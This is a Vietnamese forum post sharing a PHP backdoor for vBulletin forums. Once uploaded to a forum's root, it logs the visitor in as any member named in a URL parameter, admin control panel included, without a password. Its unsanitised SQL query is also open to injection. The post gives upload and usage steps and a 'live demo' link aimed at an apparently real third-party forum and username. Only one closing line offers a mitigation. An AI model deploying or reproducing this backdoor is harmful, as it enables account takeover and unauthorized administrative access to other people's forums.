Fakelogin - Đăng nhập vào forum VBB không cần pass

Ngày xưa forum mình bị hack thằng nào đó nó up lên, xem log tình cờ phát hiện ra, chưa rõ nguồn gốc xuất xứ

Code này có tác dụng là khi upload vào thư mục root của forum VBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass


Sau đây là code

PHP Code:

<?phpif (isset($_GET['bd']))
{define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'");
if (!$vbulletin->userinfo['userid']) die("Invalid username!");
else
{vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);exec_unstrike_user($_GET['bd']);process_new_login('cplogin', TRUE, TRUE);do_login_redirect();
}
}?>

Cách sử dụng

Copy đoạn code trên vào notepad save đuôi *.php

Upload vào thư mục chứa forum ngang hàng với file index.php

Sau đó chạy link sau

http://domain.com/forum/*.php?bd=username



Phần in đậm các bạn tùy chỉnh nha ^^



>>> Demo tươi và sống

http://www.shbabarab.com/vb/tools.php?bd=alghreeb

VBF
Giải pháp: Tạo thêm 1 lớp mật khẩu cho VBB tại admincp. Xem thêm box bảo mật